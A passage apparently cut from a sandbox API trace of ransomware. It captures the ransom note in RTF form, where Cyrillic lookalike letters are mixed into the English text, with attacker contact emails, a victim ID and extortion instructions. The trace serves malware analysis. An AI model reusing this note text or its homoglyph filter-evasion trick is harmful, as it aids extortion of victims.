t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.820] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 